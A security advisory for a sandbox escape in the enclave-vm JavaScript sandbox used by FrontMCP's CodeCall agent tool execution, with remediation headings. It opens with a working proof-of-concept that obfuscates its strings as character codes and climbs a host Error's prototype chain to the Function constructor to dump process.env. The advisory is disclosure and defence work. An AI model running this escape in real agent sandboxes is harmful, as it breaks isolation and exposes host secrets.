// Vector 35: The Host Error Escape
// Purpose: Trigger a Host-side error and traverse its prototype chain
// to reach the Host Function constructor.
const s = (...args) => String.fromCharCode(...args);
const kCon = s(99,111,110,115,116,114,117,99,116,111,114); // "constructor"
const kProto = s(95,95,112,114,111,116,111,95,95); // "__proto__"
const kLookup = s(95,95,108,111,111,107,117,112,71,101,116,116,101,114,95,95);
const kCode = s(114,101,116,117,114,110,32,112,114,111,99,101,115,115,46,101,110,118);
const kPtype = s(112,114,111,116,111,116,121,112,101);
try {
const ObjectProto = Object[kPtype];
const lookup = ObjectProto[kLookup];
const getProtoNative = lookup.call(ObjectProto, kProto);
let hostError;
try {
await callTool('THIS_TOOL_DOES_NOT_EXIST_XYZ', {});
} catch (e) {
hostError = e;
}
const errProto = getProtoNative.call(hostError);
const ErrorCtor = errProto[kCon];
const HostFunc = ErrorCtor[kCon];
const exploitFn = HostFunc(kCode);
return exploitFn();
} catch (e) {
return e.message;
}
A critical sandbox escape vulnerability exists in enclave-vm (affected: < 2.6.0, patched: 2.7.0) that can allow untrusted, sandboxed JavaScript to execute arbitrary code in the host Node.js runtime.
When a tool invocation fails, enclave-vm exposes a host-side Error object to sandboxed code. This Error object retains its host realm prototype chain, which can be traversed to reach the host
Functionconstructor:Error instance → Error.prototype → Error constructor → Function constructorWith access to the host
Functionconstructor, an attacker can compile and execute arbitrary JavaScript in the host context — bypassing the sandbox boundary and potentially gaining access to sensitive resources such asprocess.env, filesystem, and network.This breaks enclave-vm’s core security guarantee of isolating untrusted code.
Ecosystem Impact (FrontMCP / CodeCall)
FrontMCP is a TypeScript-first framework for building MCP servers, and the CodeCall plugin enables models to orchestrate large toolsets by generating and executing JavaScript plans.
Enclave is the defense-in-depth sandbox layer behind CodeCall (AST validation + runtime sandboxing). If you use FrontMCP CodeCall for agent tool execution, you should treat this as an urgent upgrade and ensure your runtime is on a patched enclave-vm version.
Live Playground (Safe Exploration & Testing)
To explore Enclave’s execution model (AgentScript + tool calls) and validate your integration behavior, use the live playground:
This is the quickest way to understand the sandbox / tool-call flow and confirm your environment is running a patched setup.
Timeline (Fast Fix)
enclave-vm@2.7.0(Jan 9, 2026)Proof of Concept
Click to expand PoC
Mitigation / Remediation
Immediate action:
Defense-in-depth guidance:
FunctionconstructorsReferences